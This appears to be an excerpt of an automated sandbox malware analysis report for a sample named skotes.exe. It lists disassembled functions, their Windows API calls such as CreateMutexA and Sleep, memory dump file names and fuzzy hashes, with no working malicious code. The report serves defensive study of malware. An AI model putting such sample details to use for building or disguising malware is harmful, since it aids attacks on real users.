
__Mtx_unlock.LIBCPMT ref: 00282F5F
GetCurrentThreadId.KERNEL32 ref: 00282F7E
__Mtx_unlock.LIBCPMT ref: 00282FCC
__Cnd_broadcast.LIBCPMT ref: 00282FE3
__Mtx_unlock.LIBCPMT ref: 002830F5
GetCurrentThreadId.KERNEL32 ref: 00283132
__Mtx_unlock.LIBCPMT ref: 0028319B

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 9d25b7cb9f7a2b16b58bb2dce373d5a5f115b06b654f448fe267c6ac3c796c76
Instruction ID: 112d0cf37d75dd4b46c86330a806906a59e0a15a438ba625cbec2dcb30d55f39
Opcode Fuzzy Hash: 9d25b7cb9f7a2b16b58bb2dce373d5a5f115b06b654f448fe267c6ac3c796c76
Instruction Fuzzy Hash: E1A1F374A22206DFDF11EF64C94875AB7F8FF15B10F148129E819D7681EB31EA24CB91

Function 002BCBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 002BCC66

Strings

v+, xrefs: 002BCBE1

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: v+
API String ID: 3213747228-837333932
Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction ID: 6e17eb706997620d35f2c3ba293bb39c89e84a28b68a6eeae4de6ac2fae4d127
Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
Instruction Fuzzy Hash: 9CB137329242879FDB15CF28C881BEEBFE5EF55380F34816AE855EB241D6749D11CB60

Function 0029BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0029BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0029BBE4
_xtime_get.LIBCPMT ref: 0029BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0029BC13

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 8b8e0c7ce038e242f54ddd884d57e56231eeb65accd09c539e6e45a1097cba46
Instruction ID: 7bc96e9f79f538ea252945ceaef98bd0ce9d82d2076a0d685ad63c96f145f7ee
Opcode Fuzzy Hash: 8b8e0c7ce038e242f54ddd884d57e56231eeb65accd09c539e6e45a1097cba46
Instruction Fuzzy Hash: 98212F71E11119AFDF01EFA4DD859BEB7B9EF48710F10002AF901A72A1DB309D119FA0

Function 002BF35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 002BF3A3

Strings

8"., xrefs: 002BF44B
`'., xrefs: 002BF375

Memory Dump Source

Source File: 00000002.00000002.2117074619.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000002.00000002.2117054149.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117074619.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117142714.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117161354.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117180396.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117275274.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117288750.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117304465.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117338736.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117362180.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117380082.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117399127.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117421062.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117438250.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117455069.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117473000.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117491406.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117514422.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117534358.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117553280.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117571687.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117591079.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117608575.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117628670.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117648246.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117668026.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117686177.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117705127.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117764474.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117782742.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117801225.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117821652.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.2117841158.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: 8".$`'.
API String ID: 3903695350-1407274480
Opcode ID: 6755b50375d7994ec020cae990b4d7e1858003dd11be026a22aa0cf945586a50
Instruction ID: b84be2d3ef211ad3324ae835c777a2c2012b2822b62d15c17639b6d5b4992752
Opcode Fuzzy Hash: 6755b50375d7994ec020cae990b4d7e1858003dd11be026a22aa0cf945586a50
Instruction Fuzzy Hash: 7F317A31620342EFEB60AE39DE45BDBB3E8EF00392F148469E045D7595DE71ACA08B21

Analysis Process: skotes.exePID: 6540, Parent PID: 3172COMMON

Execution Graph

Execution Coverage:	0.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	606
Total number of Limit Nodes:	4

Executed Functions

Function 002B652B Relevance: 1.5, APIs: 1, Instructions: 24
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,002B652A,?,?,?,?,?,002B7661), ref: 002B6567

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 4b8e4fc3a7e60d778978ae3eae9b1e06a4337c0209155b7d1ff19a2f57aa4e9a
Instruction ID: e8e9e9b0a6d31dd03aafa8e9d5e620f9146499ea1544c9ec23a2117a3beca285
Opcode Fuzzy Hash: 4b8e4fc3a7e60d778978ae3eae9b1e06a4337c0209155b7d1ff19a2f57aa4e9a
Instruction Fuzzy Hash: 3DE08C3012120CEECE36BF19C84DBD83B69EB11795F801805FC0946223CB29EDA1CA80

Function 00289BA5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117812825.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117833615.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117852895.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117871741.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117890856.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117910522.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117932280.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117952159.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117985275.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118008203.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118027728.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118047410.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2118067097.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121144701.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121345183.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121434613.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121503064.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2121595338.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2.
API String ID: 1464230837-2773616320
Opcode ID: cd12265bcced5eebb135c5511574ab6c4723c8b41f4b648c2c67af3779cdf55a
Instruction ID: a724618471db52feaeec0efae9c11b248c0c7922db2a43460168d224a8930acc
Opcode Fuzzy Hash: cd12265bcced5eebb135c5511574ab6c4723c8b41f4b648c2c67af3779cdf55a
Instruction Fuzzy Hash: 053168317252049BEB08EB78DC8D7ADB7A6EB86310F68421EE015973D6CB7689E08751

Function 00289F44 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0028A963
CreateMutexA.KERNELBASE(00000000,00000000,002E3254), ref: 0028A981

Strings

T2., xrefs: 0028A970

Memory Dump Source

Source File: 00000003.00000002.2117381478.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000003.00000002.2117364520.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117381478.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117439533.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117456541.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117474402.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117582129.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117599877.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117621517.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117676160.00000000004A3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117693676.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117712506.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117730348.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117754509.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117775522.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2117792780.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
